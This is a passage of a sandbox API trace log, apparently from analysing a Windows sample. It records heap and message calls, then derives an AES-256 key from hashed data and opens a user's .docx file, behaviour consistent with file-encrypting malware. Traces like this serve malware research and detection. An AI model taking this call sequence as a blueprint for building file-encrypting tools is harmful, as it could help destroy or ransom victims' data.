lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.061] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.061] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.061] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.062] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.062] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0037.063] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.063] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.063] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.063] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.063] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.063] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.063] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.063] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.063] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.063] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.064] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.064] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.064] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.064] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.064] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.064] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.064] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.064] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.064] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.065] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.065] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.065] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.065] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.065] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.065] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.066] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.066] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.066] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.066] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.066] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.066] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.066] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0037.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0037.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.066] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.067] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.067] CryptDestroyHash (hHash=0x7c2100) returned 1 [0037.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.067] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.067] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.067] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.067] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_h6yz.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.067] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.067] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.067] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0037.068] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.068] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: 